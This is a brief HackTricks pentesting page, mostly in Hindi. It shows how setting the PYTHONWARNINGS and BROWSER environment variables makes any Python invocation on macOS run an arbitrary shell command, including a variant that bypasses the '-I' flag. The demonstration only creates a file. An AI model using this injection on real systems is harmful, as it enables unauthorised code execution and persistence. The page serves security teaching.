macOS Python Applications Injection

Support HackTricks

PYTHONWARNINGS और BROWSER env वेरिएबल के माध्यम से

यह संभव है कि दोनों पर्यावरण वेरिएबल को इस तरह से संशोधित किया जाए कि जब भी पायथन को कॉल किया जाए, तो मनचाहा कोड निष्पादित किया जा सके, उदाहरण के लिए:

# Generate example python script
echo "print('hi')" > /tmp/script.py

# RCE which will generate file /tmp/hacktricks
PYTHONWARNINGS="all:0:antigravity.x:0:0" BROWSER="/bin/sh -c 'touch /tmp/hacktricks' #%s" python3 /tmp/script.py

# RCE which will generate file /tmp/hacktricks bypassing "-I" injecting "-W" before the script to execute
BROWSER="/bin/sh -c 'touch /tmp/hacktricks' #%s" python3 -I -W all:0:antigravity.x:0:0 /tmp/script.py
HackTricks का समर्थन करें

Last updated